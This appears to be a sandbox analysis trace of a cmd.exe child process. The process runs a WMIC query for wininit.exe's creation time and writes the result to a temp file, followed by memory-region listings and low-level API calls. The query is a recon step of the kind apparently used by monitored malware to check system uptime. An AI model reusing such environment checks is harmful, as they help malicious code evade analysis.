os_pid = "0xdd4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "17"
os_parent_pid = "0x424"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WMIC PROCESS where name=\"wininit.exe\" get creationdate |more > %TEMP%\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2383
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2384
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2385
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2386
start_va = 0x130000
end_va = 0x22ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2387
start_va = 0x4a630000
end_va = 0x4a688fff
monitored = 1
entry_point = 0x4a6390b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 2388
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2389
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2390
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2391
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2392
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2393
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 2394
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2395
start_va = 0x230000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2396
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2397
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2398
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2399
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2400
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2401
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2402
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2403
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2404
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 2405
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2406
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2407
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2408
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2409
start_va = 0x230000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000230000"
filename = ""
Region:
id = 2410
start_va = 0x3b0000
end_va = 0x4affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 2411
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 2412
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2413
start_va = 0x4b0000
end_va = 0x637fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004b0000"
filename = ""
Region:
id = 2414
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2415
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2416
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2417
start_va = 0x640000
end_va = 0x7c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000640000"
filename = ""
Region:
id = 2418
start_va = 0x7d0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007d0000"
filename = ""
Region:
id = 2419
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 2420
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 2421
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2422
start_va = 0x1bd0000
end_va = 0x1e9efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 116
os_tid = 0xdd8
[0399.962] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0399.963] GetProcessHeap () returned 0x3b0000
[0399.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4012) returned 0x3cb010
[0399.963] GetProcessHeap () returned 0x3b0000
[0399.963] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4010) returned 0x3cf030
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c4780
[0399.964] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3c4780 | out: hHeap=0x3b0000) returned 1
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cf030 | out: hHeap=0x3b0000) returned 1
[0399.964] GetProcessHeap () returned 0x3b0000
[0399.964] HeapFree (in: hHeap=0x3b0000, dwFlags=0x0, lpMem=0x3cb010 | out: hHeap=0x3b0000) returned 1
[0399.966] _wcsicmp (_String1="WMIC", _String2=")") returned 78
[0399.966] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17
[0399.966] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17
[0399.966] _wcsicmp (_String1="IF", _String2="WMIC") returned -14
[0399.966] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14
[0399.966] _wcsicmp (_String1="REM", _String2="WMIC") returned -5
[0399.966] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5
[0399.966] GetProcessHeap () returned 0x3b0000
[0399.966] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9e80
[0399.967] GetProcessHeap () returned 0x3b0000
[0399.967] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c4780
[0399.969] GetProcessHeap () returned 0x3b0000
[0399.969] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x78) returned 0x3c9f40
[0399.970] GetProcessHeap () returned 0x3b0000
[0399.970] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3c9fc0
[0399.971] _wcsicmp (_String1="FOR", _String2="more") returned -7
[0399.971] _wcsicmp (_String1="FOR/?", _String2="more") returned -7
[0399.971] _wcsicmp (_String1="IF", _String2="more") returned -4
[0399.971] _wcsicmp (_String1="IF/?", _String2="more") returned -4
[0399.971] _wcsicmp (_String1="REM", _String2="more") returned 5
[0399.972] _wcsicmp (_String1="REM/?", _String2="more") returned 5
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xb0) returned 0x3ca080
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1a) returned 0x3c47b0
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x14) returned 0x3c8640
[0399.972] GetProcessHeap () returned 0x3b0000
[0399.972] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38) returned 0x3c67d0
[0399.981] GetProcessHeap () returned 0x3b0000
[0399.981] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x6a) returned 0x3ca140
[0399.983] GetProcessHeap () returned 0x3b0000
[0399.984] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x48) returned 0x3ca1c0
[0399.984] _pipe (in: _PtHandles=0x3ca1d0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x3ca1d0) returned 0
[0399.984] _dup (_FileHandle=1) returned 5
[0399.985] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0
[0399.986] _close (_FileHandle=4) returned 0
[0399.987] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.987] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.987] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.987] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.987] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.987] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.987] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.988] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.988] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.988] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.988] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.988] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.988] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.988] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.988] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.988] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.988] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.988] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.988] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.988] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.989] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.989] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.989] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.989] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.989] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.989] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.989] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.989] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.989] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.989] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.989] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.989] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.989] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.989] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.989] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.989] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.989] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.990] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.990] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.990] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.990] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.990] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.990] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.990] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.990] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.990] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.990] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.990] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.990] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.991] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.991] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.991] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.991] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.991] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.991] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.991] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.991] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.991] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.991] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.991] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.991] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.992] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.992] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.992] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.992] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.992] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.992] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.992] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.992] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.992] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.992] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17
[0399.992] _wcsicmp (_String1="WMIC", _String2="IF") returned 14
[0399.992] _wcsicmp (_String1="WMIC", _String2="REM") returned 5
[0399.993] GetProcessHeap () returned 0x3b0000
[0399.993] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x4010) returned 0x3cb010
[0399.993] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19
[0399.993] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18
[0399.993] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19
[0399.993] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3
[0399.993] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="CD") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20
[0399.993] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5
[0399.993] _wcsicmp (_String1="WMIC", _String2="REN") returned 5
[0399.993] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18
[0399.993] _wcsicmp (_String1="WMIC", _String2="SET") returned 4
[0399.994] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19
[0399.994] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3
[0399.994] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="MD") returned 10
[0399.994] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10
[0399.994] _wcsicmp (_String1="WMIC", _String2="RD") returned 5
[0399.994] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5
[0399.994] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7
[0399.994] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16
[0399.994] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4
[0399.994] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20
[0399.994] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20
[0399.994] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1
[0399.994] _wcsicmp (_String1="WMIC", _String2="VER") returned 1
[0399.994] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1
[0399.995] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18
[0399.995] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4
[0399.995] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18
[0399.995] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3
[0399.995] _wcsicmp (_String1="WMIC", _String2="START") returned 4
[0399.995] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19
[0399.995] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12
[0399.995] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10
[0399.995] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7
[0399.995] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7
[0399.995] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22
[0399.995] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17
[0399.995] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21
[0399.995] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20
[0399.995] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10
[0399.996] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20
[0399.996] GetProcessHeap () returned 0x3b0000
[0399.996] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x420) returned 0x3cf030
[0399.996] SetErrorMode (uMode=0x0) returned 0x0
[0399.996] SetErrorMode (uMode=0x1) returned 0x0
[0399.997] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3cf040, lpFilePart=0x22f7d0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22f7d0*="system32") returned 0x13
[0399.997] SetErrorMode (uMode=0x0) returned 0x1
[0399.997] GetProcessHeap () returned 0x3b0000
[0399.997] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf030, Size=0x42) returned 0x3cf030
[0399.997] GetProcessHeap () returned 0x3b0000
[0399.997] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf030) returned 0x42
[0399.997] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0399.997] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0399.998] GetProcessHeap () returned 0x3b0000
[0399.998] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x1ce) returned 0x3ca210
[0399.998] GetProcessHeap () returned 0x3b0000
[0399.998] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0x38c) returned 0x3cf090
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf090, Size=0x1d0) returned 0x3cf090
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf090) returned 0x1d0
[0400.019] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a65f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x8, Size=0xe8) returned 0x3cf270
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlReAllocateHeap (Heap=0x3b0000, Flags=0x0, Ptr=0x3cf270, Size=0x7e) returned 0x3cf270
[0400.019] GetProcessHeap () returned 0x3b0000
[0400.019] RtlSizeHeap (HeapHandle=0x3b0000, Flags=0x0, MemoryPointer=0x3cf270) returned 0x7e
[0400.021] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.022] GetLastError () returned 0x2
[0400.022] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.022] GetLastError () returned 0x2
[0400.022] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.023] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.027] GetLastError () returned 0x2
[0400.027] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\WMIC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.027] GetLastError () returned 0x2
[0400.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*" (normalized: "c:\\windows\\system32\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.028] GetLastError () returned 0x2
[0400.028] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC" (normalized: "c:\\windows\\system32\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.028] GetLastError () returned 0x2
[0400.028] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*" (normalized: "c:\\windows\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.029] GetLastError () returned 0x2
[0400.029] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC" (normalized: "c:\\windows\\wmic"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0xffffffffffffffff
[0400.029] GetLastError () returned 0x2
[0400.029] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0400.030] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*" (normalized: "c:\\windows\\system32\\wbem\\wmic.*"), fInfoLevelId=0x1, lpFindFileData=0x22f540, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f540) returned 0x3ca3f0
[0400.030] GetProcessHeap () returned 0x3b0000
[0400.030] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x28) returned 0x3c47e0
[0400.030] FindClose (in: hFindFile=0x3ca3f0 | out: hFindFile=0x3ca3f0) returned 1
